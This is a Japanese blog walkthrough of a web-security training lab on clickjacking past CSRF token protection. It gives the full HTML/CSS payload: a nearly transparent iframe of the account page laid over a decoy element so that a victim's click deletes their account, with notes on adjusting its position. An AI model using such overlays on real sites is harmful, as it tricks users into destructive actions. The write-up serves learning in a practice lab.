shikata ga nai

Private? There is no such things.

Basic clickjacking with CSRF token protectionをやってみた

 Hello there, ('ω')ノ

 

 CSRFトークン保護を使用した基本的なクリックジャッキングを。 

まずは、ログインして。

 

f:id:ThisIsOne:20210212141852p:plain

 

Account actionsをクリックしてページを表示して。

Delete accountをクリックすると。

 

f:id:ThisIsOne:20210212141931p:plain

 

CSRFトークンで保護されているようで。

 

f:id:ThisIsOne:20210212142214p:plain

 

一旦、Dropして。

 

f:id:ThisIsOne:20210212142250p:plain

 

ブラウザボタンで戻って。

クリックさせるおとりとなるウェブサイトを表示させて。

 https://ac541f071feb9c3380ca2cc600430089.web-security-academy.net/account

 

f:id:ThisIsOne:20210212143123p:plain

 

ページ上にかぶせるおとりのページを作成して。

opacityは、透明度を表していて。

下記をエクスプロイトサーバへ貼り付けて、View exploitを。

 

<style>
iframe {
 position:relative;
 width:700px;
 height: 500px;
 opacity: 0.0001;
 z-index: 2;
}
div {
 position:absolute;
 top:300px;
 left:60px;
 z-index: 1;
}
</style>


<div>Test me</div>


<iframe src="https://ac541f071feb9c3380ca2cc600430089.web-security-academy.net/account"></iframe>

 

f:id:ThisIsOne:20210212143248p:plain

 

マウスを当ててみると、Test meの位置とクリックできる位置がずれているので。

 

f:id:ThisIsOne:20210212143321p:plain

 

再度、位置の調整を。

 top:320px;

 

f:id:ThisIsOne:20210212143454p:plain

 

Click meとマウスのボタンの位置が一致したので、Deliver exploit victimを押すと。

 

f:id:ThisIsOne:20210212143513p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210212143633p:plain

 

ちなみに透明度をOFFにすると、下記のようにターゲットとなる画面が表示されて。

 

f:id:ThisIsOne:20210212182531p:plain

 

下記のように透明度を変更すると、もっとクリックジャッキングが理解できるかも。
 opacity: 0.5

 

f:id:ThisIsOne:20210212182745p:plain

 

Best regards, (^^ゞ

 

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain